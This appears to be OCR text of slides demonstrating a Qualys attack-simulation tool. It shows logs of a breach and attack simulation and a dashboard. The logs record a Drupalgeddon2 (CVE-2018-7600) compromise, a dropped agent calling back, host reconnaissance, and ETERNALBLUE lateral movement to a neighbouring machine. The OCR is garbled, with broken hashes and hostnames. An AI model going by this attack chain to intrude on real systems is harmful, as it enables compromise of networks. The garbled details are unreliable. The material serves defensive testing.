[T1190][INFORMATION]: Successfully exploited using Drupalgeddon2 exploit - CVE 
[T1190] [INFORMATION]: Dropped file: sda32fds.exe (SHA1: f£47a48094c1f21fef892f2 


[STATUS]: Waiting for connection from sda32fds.exe 
[STATUS]: Connection received on TCP 32282 
[STATUS]: Process infromation sda32fds.exe (SHA1: f47a48094c1f21fef892f27b8b6a 


[INFORMATION]: Current QAttack agent privileges: user 

[SYSTEMINFO]: Currently logged on user: CORP/user1 

[SYSTEMINFO]: Operating system: Windows 7 SP1 (OS Build 6.1.7601) 
[SYSTEMINFO]: Processor: Intel (R) CORE(TM) i7-7700 CPU @ 3.60GHz 3.60GHz 
[SYSTEMINFO]: Installed memory (RAM): 12.0 GB 

[SYSTEMINFO]: System type: 64-bit Operating System, x64-based processor 
[SYSTEMINFO Locale: EN-US 

[SYSTEMINFO]: Computer name: THINKPAD-111991-M710 

[SYSTEMINFO]: Full computer name: T-111991-M710.corp.domain.com 
[SYSTEMINFO]: Domain: corp.domain.com 

[SYSTEMINFO]: Anti Virus installed: Yes 

[SYSTEMINFO]: Anti Virus detected: Symantec Endpoint Protection Small Business 


[STATUS]:|11018: Found 3 neighbors using discovery module 
[INSECURECONFIG]: Found SMB vi enabled on 192.168.1.101 

[STATUS]: Testing for T1210: Exploitation of Remote Services 
[EXPLOITSUGGESTER]: Launching ETERNALBLUE module against 192.168.1.101 
[T121@][INFORMATION]: Module ETERNALBLUE in progress 

[EXPLOIT]: Sent 308B shellcode 


[EXPLOIT]:|Module ETERNALBLUE successful. 


[LATERALMOVEMENT]: Pivoting from 192.168.1.100 to 192.168.1.101 via Module ETE 


[EXPOIT]: QAttack agent copy sent to 192.168.1.101 

[INFORMATION]: QAttack agent information: sdfwe3223d.exe (SHA1: e41a48094c1f21 
fef892f27b8b6a7ed2bbf@c29g) 

[20/Nov/2018] 13:55:10 PM [STATUS]: All tests complete. 


© Qualys. Enterprise 


Live View: Drupalgeddon2 ELTE o | 


Search Options ¥ 


A 


Q, Search... 


IDENTIFICATION TACTICS BREAKDOWN BY STATUS 


Scan: Drupalgeddon2 
Campaign: exploit.vulnerability.drupalgeddon2 
Status: InProgress Pm 2 


TACTICS 


Initial Access 

Execution PR adi 

Persistence Wo T 192.168.1.103 
Privilege Escalation : Ze B 

Defense Evasion 

X^ 6 more IP: 192.168.1.100 


` Hostname:  https://corpdomain.tid 
STATUS (ei - ex Username: CORP/administrator 


Breached Ge 192.168.111. Processor AMD ThreadRipper 1980x 
Safe 


Privileges: ^ administrator 
Error 


OPERATING SYSTEM 


Windows 2012 Server ttes 192.168.1.105 

Windows Server 2012 R2 

Windwos Server 8.1 

Windows 7 SP1 

Windows 10 ENTERPRISE 192.168.1.110 


Breached ` 192.168.1.101 — THINKPAD-98689-M710‏ | 676 عا 


[11/10/2018] 10:01:27 AM [STATUS]: Testing for 1 of 3 technique(s) - T1190: Exploit Public-Facing Application 

[11/10/2018] 10:01:28 AM [T1190][INFORMATION]: Found public facing Drupal web host: https://corpdomain.tld/blog 

[11/10/2018] 10:01:35 AM [T1190][INFORMATION]: Drupal 7.46 detected via https://corpdomain.tid/blog/ CHANGELOG txt 
[11/10/2018] 10:01:43 AM [T1190][INFORMATION]: Successfully exploited using Drupalgeddon2 exploit - CVE-2018-7600 

[11/10/2018] 10:01:51 AM [T1190][INFORMATION]: Dropped file: sda32fds.exe (SHA1: f47a48094c1f21fef892f27b8b6a7ed2bbf0c29g) 
[11/10/2018] 10:01:52 AM [STATUS]: Waiting for connection from sda32fds.exe 


(9sc. A 


Merci, Grazie! 
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